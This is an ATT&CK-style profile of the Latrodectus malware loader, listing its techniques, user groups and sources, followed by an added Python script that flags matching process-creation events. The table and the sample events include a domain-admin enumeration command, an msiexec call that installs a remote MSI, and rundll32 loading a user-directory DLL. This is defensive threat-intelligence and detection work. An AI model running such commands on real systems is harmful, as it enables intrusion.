Latrodectus
Associated Software Descriptions

Name | Description
---|---
IceNova | (Citation: Bleeping Computer Latrodectus April 2024)
Unidentified 111 | (Citation: Bleeping Computer Latrodectus April 2024)
Techniques Used

Domain | ID | Name | Use
---|---|---|---
Enterprise | T1087.002 | Account Discovery: Domain Account | Latrodectus can run `C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain` to identify domain administrator accounts.(Citation: Elastic Latrodectus May 2024)
Enterprise | T1071.001 | Application Layer Protocol: Web Protocols | Latrodectus can send registration information to C2 via HTTP `POST`.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1547.001 | Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder | Latrodectus can set an AutoRun key to establish persistence.(Citation: Latrodectus APR 2024)
Enterprise | T1059.003 | Command and Scripting Interpreter: Windows Command Shell | The Latrodectus command handler can use `cmd.exe` to run multiple discovery commands.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1059.007 | Command and Scripting Interpreter: JavaScript | Latrodectus has used JavaScript files as part of its infection chain during malicious spam email campaigns.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)(Citation: Palo Alto Latrodectus Activity June 2024)
Enterprise | T1132.001 | Data Encoding: Standard Encoding | Latrodectus has Base64-encoded the message body of an HTTP request sent to C2.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)
Enterprise | T1573.001 | Encrypted Channel: Symmetric Cryptography | Latrodectus can send RC4-encrypted data over C2 channels.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1564.004 | Hide Artifacts: NTFS File Attributes | Latrodectus can delete itself while its process is still running through the use of an alternate data stream.(Citation: Elastic Latrodectus May 2024)
Enterprise | T1070.004 | Indicator Removal: File Deletion | Latrodectus has the ability to delete itself.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1559.001 | Inter-Process Communication: Component Object Model | Latrodectus can use the Windows Component Object Model (COM) to set scheduled tasks.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1036.005 | Masquerading: Match Legitimate Name or Location | Latrodectus has been packed to appear as a component of Bitdefender's kernel-mode driver, TRUFOS.SYS.(Citation: Elastic Latrodectus May 2024)
Enterprise | T1027.001 | Obfuscated Files or Information: Binary Padding | Latrodectus has been obfuscated with a 129-byte sequence of junk data prepended to the file.(Citation: Elastic Latrodectus May 2024)
Enterprise | T1027.002 | Obfuscated Files or Information: Software Packing | The Latrodectus payload has been packed for obfuscation.(Citation: Elastic Latrodectus May 2024)
Enterprise | T1027.007 | Obfuscated Files or Information: Dynamic API Resolution | Latrodectus can resolve Windows APIs dynamically by hash.(Citation: Latrodectus APR 2024)
Enterprise | T1027.013 | Obfuscated Files or Information: Encrypted/Encoded File | Latrodectus has used a pseudorandom number generator (PRNG) algorithm and a rolling XOR key to obfuscate strings.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1069.002 | Permission Groups Discovery: Domain Groups | Latrodectus can identify domain groups through `cmd.exe /c net group "Domain Admins" /domain`.(Citation: Bitsight Latrodectus June 2024)(Citation: Elastic Latrodectus May 2024)
Enterprise | T1566.001 | Phishing: Spearphishing Attachment | Latrodectus has been distributed through reply-chain phishing emails with malicious attachments.(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1566.002 | Phishing: Spearphishing Link | Latrodectus has been distributed to victims through emails containing malicious links.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1021.005 | Remote Services: VNC | Latrodectus has routed C2 traffic using Keyhole VNC.(Citation: Palo Alto Latrodectus Activity June 2024)
Enterprise | T1053.005 | Scheduled Task/Job: Scheduled Task | Latrodectus can create scheduled tasks for persistence.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1518.001 | Software Discovery: Security Software Discovery | Latrodectus has the ability to identify installed antivirus products.(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
Enterprise | T1218.007 | System Binary Proxy Execution: Msiexec | Latrodectus has called `msiexec` to install remotely hosted MSI files.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1218.011 | System Binary Proxy Execution: Rundll32 | Latrodectus can use `rundll32.exe` to execute downloaded DLLs.(Citation: Elastic Latrodectus May 2024)(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1204.001 | User Execution: Malicious Link | Latrodectus has been executed through malicious links distributed in email campaigns.(Citation: Latrodectus APR 2024)(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1204.002 | User Execution: Malicious File | Latrodectus has lured users into opening malicious email attachments for execution.(Citation: Bleeping Computer Latrodectus April 2024)
Enterprise | T1497.001 | Virtualization/Sandbox Evasion: System Checks | Latrodectus can determine if it is running in a virtualized environment by checking the OS version, checking the number of running processes, ensuring a 64-bit application is running on a 64-bit host, and checking if the host has a valid MAC address.(Citation: Latrodectus APR 2024)(Citation: Elastic Latrodectus May 2024)(Citation: Bitsight Latrodectus June 2024)
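As an added example, not part of the ATT&CK entry or of any cited vendor report, the following Python pass runs simple detection rules over constructed process-creation records and tags each hit with the technique IDs listed above: the `net group "Domain Admins" /domain` enumeration, `msiexec` pulling a remote MSI, and `rundll32.exe` loading a DLL from outside OS or vendor directories. The sample events, file paths and URL are all constructed placeholders.

```python
import re

# Constructed sample process-creation records (parent image, image, command line),
# in the shape a Sysmon Event ID 1 or EDR process-start event would carry.
# None come from a real incident; paths and the URL are placeholders.
SAMPLE_EVENTS = [
    ("explorer.exe", "cmd.exe",
     r'C:\Windows\System32\cmd.exe /c net group "Domain Admins" /domain'),
    ("wscript.exe", "msiexec.exe",
     r'msiexec.exe /i http://update.example.invalid/setup.msi /qn'),
    ("cmd.exe", "rundll32.exe",
     r'rundll32.exe C:\Users\Public\helper.dll,Run'),
    ("svchost.exe", "rundll32.exe",
     r'rundll32.exe C:\Windows\System32\shell32.dll,Control_RunDLL'),
    ("explorer.exe", "notepad.exe", r'notepad.exe C:\Users\user\notes.txt'),
]

# Domain-admin group enumeration via net/net1 (T1087.002 and T1069.002 above).
DOMAIN_ADMINS = re.compile(
    r'\bnet1?(?:\.exe)?\s+group\s+"?domain admins"?\s+/domain\b', re.I)
# msiexec installing from a remote URL (T1218.007 above).
REMOTE_MSI = re.compile(r'\bmsiexec(?:\.exe)?\b.*\bhttps?://', re.I)
# rundll32 loading a DLL; the DLL path is checked separately (T1218.011 above).
RUNDLL32_DLL = re.compile(r'\brundll32(?:\.exe)?\s+"?([^",\s]+\.dll)', re.I)
# DLLs under these prefixes are treated as OS/vendor-installed rather than downloaded.
TRUSTED_DLL_PREFIXES = ("c:\\windows\\", "c:\\program files")


def classify(cmdline):
    """Return the technique IDs from the table above that a command line matches."""
    hits = []
    if DOMAIN_ADMINS.search(cmdline):
        hits += ["T1087.002", "T1069.002"]
    if REMOTE_MSI.search(cmdline):
        hits.append("T1218.007")
    m = RUNDLL32_DLL.search(cmdline)
    if m and not m.group(1).lower().startswith(TRUSTED_DLL_PREFIXES):
        hits.append("T1218.011")
    return hits


def scan(events):
    """Return (image, parent, technique_ids) for each event matching at least one rule."""
    results = []
    for parent, image, cmd in events:
        techs = classify(cmd)
        if techs:
            results.append((image, parent, techs))
    return results


if __name__ == "__main__":
    for image, parent, techs in scan(SAMPLE_EVENTS):
        print(f"{parent} -> {image}: {', '.join(techs)}")
```

The trusted-prefix check is what keeps the benign `shell32.dll` launch out of the results; in production the same idea would be backed by signer or path allow-lists rather than two string prefixes.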
Groups That Use This Software

ID | Name | References
---|---|---
G1037 | TA577 | (Citation: Latrodectus APR 2024)
G1038 | TA578 | (Citation: Bitsight Latrodectus June 2024) (Citation: Latrodectus APR 2024)
References
- Abrams, L. (2024, April 30). New Latrodectus malware attacks use Microsoft, Cloudflare themes. Retrieved September 13, 2024.
- Batista, J. (2024, June 17). Latrodectus, are you coming back? Retrieved September 13, 2024.
- Proofpoint Threat Research and Team Cymru S2 Threat Research. (2024, April 4). Latrodectus: This Spider Bytes Like Ice. Retrieved May 31, 2024.
- Unit 42. (2024, June 25). 2024-06-25-IOCs-from-Latrodectus-activity. Retrieved September 13, 2024.
- Stepanic, D. and Bousseaden, S. (2024, May 15). Spring Cleaning with LATRODECTUS: A Potential Replacement for ICEDID. Retrieved September 13, 2024.